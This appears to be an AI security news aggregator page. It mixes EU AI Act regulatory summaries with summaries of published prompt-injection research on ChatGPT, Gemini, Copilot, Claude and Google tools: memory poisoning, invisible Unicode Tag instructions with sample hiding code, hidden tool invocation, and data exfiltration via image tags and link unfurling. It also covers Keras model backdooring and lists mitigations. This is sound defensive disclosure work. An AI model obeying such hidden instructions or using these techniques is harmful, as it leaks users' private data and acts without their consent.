aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Industry News

New tools, products, platforms, funding rounds, and company developments in AI security.

1283 items

Why work at the EU AI Office?

info · regulatory · policy
Jun 7, 2024

This article describes the EU AI Office, a newly established regulatory organization within the European Commission tasked with enforcing the AI Act (the world's first comprehensive binding AI regulation) across the European Union. Unlike AI safety institutes in other countries, the EU AI Office has actual enforcement powers to require AI model providers to fix problems or remove non-compliant models from the market. The office will conduct model evaluations, investigate violations, and work with international partners to shape global AI governance standards.

EU AI Act Updates

Automatic Tool Invocation when Browsing with ChatGPT - Threats and Mitigations

medium · news · security · safety

Robust governance for the AI Act: Insights and highlights from Novelli et al. (2024)

info · regulatory · policy
May 24, 2024

This overview discusses the European AI Act and the governance framework needed to implement it, focusing on the European Commission's responsibilities and the AI Office. Key tasks include establishing guidelines for classifying high-risk AI systems, defining what counts as significant modifications (changes that alter a system's risk level), and setting standards for transparency and enforcement across EU member states.

ChatGPT: Hacking Memories with Prompt Injection

medium · news · security · safety

Machine Learning Attack Series: Backdooring Keras Models and How to Detect It

info · news · security · research

Pivot to the Clouds: Cookie Theft in 2024

info · news · security
May 16, 2024

A researcher examined browser remote debugging features as a potential method for stealing sensitive data like cookies, building on past work about cookie theft techniques. The post references Google's guidance on detecting browser data theft through Windows Event Logs and DPAPI (Data Protection API, a Windows system that encrypts sensitive information) calls, but focuses on exploring whether remote debugging could be used to bypass these detection methods.

Bobby Tables but with LLM Apps - Google NotebookLM Data Exfiltration

medium · news · security · safety

HackSpaceCon 2024: Short Trip Report, Slides and Rocket Launch

info · news · security
Apr 13, 2024

HackSpaceCon 2024, held at Kennedy Space Center, featured a keynote by Dave Kennedy on making the world safer through security practices. Kennedy highlighted that attackers can easily modify existing malware (pre-written malicious code) to evade detection systems, and emphasized the importance of active threat hunting (proactively searching for signs of attacks rather than waiting for alerts).

Google AI Studio Data Exfiltration via Prompt Injection - Possible Regression and Fix

info · news · security
Apr 7, 2024

Google AI Studio had a vulnerability that allowed attackers to steal data through prompt injection (tricking an AI by hiding malicious instructions in its input), where a malicious file could trick the AI into exfiltrating other uploaded files to an attacker's server via image tags. The vulnerability appeared in a recent update but was fixed within 12 days of being reported to Google on February 17, 2024.
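Mitigations for this class of bug usually sit on the rendering side. As a generic sketch (not Google's actual fix; the function name and allowlist below are hypothetical), an application displaying model output could drop markdown image references whose host is not explicitly trusted, closing the image-tag exfiltration channel:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: domains the application itself serves images from.
TRUSTED_IMAGE_HOSTS = {"example-app.com"}

# Matches markdown image syntax: ![alt](url)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Remove markdown images whose host is not allowlisted, so model
    output cannot smuggle data out via attacker-controlled image URLs."""
    def repl(match):
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in TRUSTED_IMAGE_HOSTS else ""
    return MD_IMAGE.sub(repl, markdown)
```

For example, strip_untrusted_images('See ![x](https://attacker.example/leak?d=SECRET)') removes the image reference while leaving the surrounding text intact.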

The dangers of AI agents unfurling hyperlinks and what to do about it

medium · news · security · safety

The AI Office is hiring

info · regulatory · policy
Mar 22, 2024

The European Commission is hiring AI specialists to work in the AI Office, which will enforce the EU's AI Act by overseeing compliance of general-purpose AI models (large AI systems available to the public). The office will have real regulatory powers to require companies to implement safety measures, restrict models, or remove them from the market, and will develop evaluation tools and benchmarks to identify dangerous AI behaviors.

The AI Office: What is it, and how does it work?

info · regulatory · policy
Mar 21, 2024

The European AI Office is a new EU regulator created under the AI Act to oversee general-purpose AI (GPAI) models and systems (AI designed to perform a wide range of tasks) across all 27 EU Member States. It monitors compliance, analyzes emerging risks, develops evaluation capabilities, produces voluntary codes of practice for companies to follow, and coordinates enforcement between national regulators and international partners. The Office also supports small and medium businesses with compliance resources and oversees regulatory sandboxes, which are controlled environments where companies can test AI systems before full deployment.

ASCII Smuggler - Improvements

info · news · security
Mar 4, 2024

ASCII Smuggler is a tool that hides text within regular content using Unicode characters, and this update adds new features like optional rendering of Unicode Tags (special markers that show where hidden text begins and ends), URL decoding of input, flexible output modes to either highlight or isolate hidden text, and improved mobile compatibility with a better user interface.
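The underlying trick is simple enough to sketch in a few lines. This is a minimal illustration of the general Unicode Tags technique the tool relies on, not its actual source code:

```python
# The Unicode Tags block (U+E0000-U+E007F) mirrors ASCII but renders
# invisibly in most UI elements. Offsetting each ASCII code point by
# 0xE0000 therefore hides it in plain sight.
TAG_OFFSET = 0xE0000

def hide(text: str) -> str:
    """Encode ASCII text as invisible Unicode Tag characters."""
    return "".join(chr(TAG_OFFSET + ord(c)) for c in text if ord(c) < 128)

def reveal(text: str) -> str:
    """Recover any hidden Tag characters from a string."""
    return "".join(
        chr(ord(c) - TAG_OFFSET)
        for c in text
        if TAG_OFFSET <= ord(c) <= TAG_OFFSET + 0x7F
    )
```

A string like "harmless text" + hide("ignore previous instructions") displays as just "harmless text" in most interfaces, while reveal() (or an LLM tokenizer) still recovers the hidden payload.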

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot

medium · news · security · research

AI Act Implementation: Timelines & Next steps

info · regulatory · policy
Feb 28, 2024

The EU AI Act is a regulatory framework that requires companies to comply with rules for different types of AI systems on specific timelines, starting with prohibitions on the riskiest AI uses within 6 months and expanding to cover high-risk AI systems (such as those used in law enforcement, hiring, or education) by 24 months after the law takes effect. The article outlines key compliance deadlines, secondary laws the EU Commission might create to clarify the rules, and guidance documents to help organizations understand how to follow the AI Act.

High-level summary of the AI Act

info · regulatory · policy
Feb 27, 2024

The EU AI Act classifies AI systems by risk level, from prohibited (like social scoring systems that manipulate behavior) to minimal risk (unregulated). High-risk AI systems, such as those used in critical decisions affecting people's lives, face strict regulations requiring developers to provide documentation, conduct testing, and monitor for problems. General-purpose AI models (large language models that can do many tasks) have lighter requirements unless they present systemic risk, in which case developers must test them against adversarial attacks (attempts to trick or break them) and report serious incidents.

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation

medium · news · security · safety

ChatGPT: Lack of Isolation between Code Interpreter sessions of GPTs

high · news · security
Feb 14, 2024

ChatGPT's Code Interpreter (a sandbox environment that runs code) was not properly isolated between different GPTs, meaning files uploaded to one GPT were visible and could be modified by other GPTs used by the same person, creating a security risk where malicious GPTs could steal or overwrite sensitive files. OpenAI addressed this vulnerability in May 2024.

Video: ASCII Smuggling and Hidden Prompt Instructions

medium · news · security
Feb 12, 2024

Researchers discovered ASCII Smuggling, a technique using Unicode Tags Block characters (special Unicode codes that mirror ASCII but stay invisible in UI elements) to hide prompt injections (tricky instructions hidden in AI input) that large language models interpret as regular text. This attack is particularly dangerous for LLMs because they can both read these hidden messages and generate them in responses, enabling more sophisticated attacks beyond traditional methods like XSS (cross-site scripting, injecting malicious code into websites) and SSRF (server-side request forgery, tricking a server into making unauthorized requests).

Hidden Prompt Injections with Anthropic Claude

medium · news · security · safety

Automatic Tool Invocation when Browsing with ChatGPT
Embrace The Red, May 28, 2024

ChatGPT's browsing tool can be tricked into automatically invoking other tools (such as image creation or memory management) when users visit websites containing hidden instructions, a vulnerability known as prompt injection (tricking an AI by hiding instructions in its input). While OpenAI added some protections, minor prompting tricks can bypass them, and the issue affects other AI applications as well.

Fix: For custom GPTs with AI Actions, creators can use the x-openai-isConsequential flag as a mitigation to put users in control, though the source notes this approach 'still lacks a great user experience, like better visualization to understand what the action is about to do.'

Fix (for 'Robust governance for the AI Act: Insights and highlights from Novelli et al. (2024)', EU AI Act Updates): The source suggests that the Commission adopt 'predetermined change management plans akin to those in medicine' to assess modifications to AI systems. These plans would be documents outlining anticipated changes (such as performance adjustments or shifts in intended use) and the methods for evaluating whether those changes substantially alter the system's risk level. The source also recommends that standard fine-tuning of foundation models (training adjustments to pre-existing AI models) not be considered a significant modification unless safety layers are removed or other actions clearly increase risk.

ChatGPT: Hacking Memories with Prompt Injection
Embrace The Red, May 22, 2024

ChatGPT's memory feature, which lets the AI remember information across chat sessions for a more personalized experience, can be exploited through indirect prompt injection (tricking an AI by hiding malicious instructions in its input). Attackers could manipulate ChatGPT into storing false information, biases, or unwanted instructions by injecting commands through connected apps like Google Drive, uploaded documents, or web browsing features.

Machine Learning Attack Series: Backdooring Keras Models and How to Detect It
Embrace The Red, May 18, 2024

This post examines how attackers can insert hidden malicious code into machine learning models (a technique called backdooring) through supply-chain attacks, specifically targeting Keras models (a popular framework for building AI systems). The authors demonstrate the attack and then explore tools that can detect when a model has been compromised in this way.

Bobby Tables but with LLM Apps - Google NotebookLM Data Exfiltration
Embrace The Red, Apr 15, 2024

Google's NotebookLM lets users upload files for an AI to analyze, but it is vulnerable to prompt injection (tricking the AI via instructions hidden in uploaded files) that can manipulate the AI's responses and what users see. The tool also has a data exfiltration vulnerability (attackers stealing information) when processing untrusted files, and there is currently no known way to prevent these attacks, meaning users cannot fully trust the AI's responses when working with files from unknown sources.

Fix (for 'Google AI Studio Data Exfiltration via Prompt Injection - Possible Regression and Fix', Embrace The Red): The issue was fixed by Google and no longer reproduced when the company responded to the report 12 days later (by approximately February 29, 2024). The ticket was closed as 'Duplicate' on March 3, 2024, suggesting the vulnerability may also have been caught through internal testing.

The dangers of AI agents unfurling hyperlinks and what to do about it
Embrace The Red, Apr 3, 2024

Unfurling is when an application automatically expands hyperlinks to show previews, which can be exploited in AI chatbots to leak data. When an attacker uses prompt injection (tricking an AI by hiding instructions in its input) to make the chatbot generate a link containing sensitive information from earlier conversations, the unfurling feature automatically sends that data to a third-party server, potentially exposing private information.

Fix: To disable unfurling in Slack apps, include the unfurl settings in the JSON object when creating the message:

    import json

    def create_message(text):
        message = {
            "text": text,
            "unfurl_links": False,
            "unfurl_media": False,
        }
        return json.dumps(message)

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot
Embrace The Red, Mar 3, 2024

Attackers can mount conditional prompt injection attacks (hidden malicious instructions that activate only for specific users) against Microsoft Copilot by leveraging user identity information, such as names and job titles, that the AI includes in its context. A researcher demonstrated this by sending an email with hidden instructions that made Copilot behave differently depending on which person opened it, showing that LLM applications become more vulnerable as attackers learn to target specific users rather than all users equally.

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation
Embrace The Red, Feb 23, 2024

A researcher discovered a vulnerability in Google Gemini where attackers can hide instructions in emails that trick the AI into automatically calling external tools (called Extensions) without the user's knowledge. When a user asks the AI to analyze a malicious email, the AI follows the hidden instructions and invokes the tool, a form of request forgery (making unauthorized requests on behalf of the user).

Fix (for 'ChatGPT: Lack of Isolation between Code Interpreter sessions of GPTs', Embrace The Red): OpenAI addressed this vulnerability in May 2024. Additionally, the source recommends: 'Disable Code Interpreter in private GPTs with private knowledge files (as they will be accessible to other GPTs)' and notes that 'when creating a new GPT Code Interpreter is off by default' as one change OpenAI made. Users should avoid uploading sensitive files to Code Interpreter and use third-party GPTs with caution, especially those with Code Interpreter enabled.

Fix (for 'Video: ASCII Smuggling and Hidden Prompt Instructions', Embrace The Red): As a developer, a possible mitigation is to remove Unicode Tags Block text on the way in and out, meaning filter it both when users send input to your LLM and when the LLM sends responses back to users. Additionally, test your own LLM applications for this attack vector to identify vulnerabilities.
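The in-and-out filtering that this fix describes can be sketched as a small helper; this is a generic illustration, not code from the source:

```python
def strip_unicode_tags(text: str) -> str:
    """Remove every code point in the Unicode Tags Block (U+E0000-U+E007F).
    Apply this both to user input before it reaches the LLM and to LLM
    output before it is rendered or forwarded."""
    return "".join(c for c in text if not 0xE0000 <= ord(c) <= 0xE007F)
```

Running both directions of traffic through a filter like this strips hidden instructions without altering visible text.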

Hidden Prompt Injections with Anthropic Claude
Embrace The Red, Feb 8, 2024

A researcher discovered that Anthropic's Claude is vulnerable to hidden prompt injections using Unicode Tags code points (invisible characters that can carry secret instructions in text). Like ChatGPT before it, Claude can interpret and follow these hidden instructions even though users cannot see them on screen. The researcher reported the issue to Anthropic, but the ticket was closed without further details provided.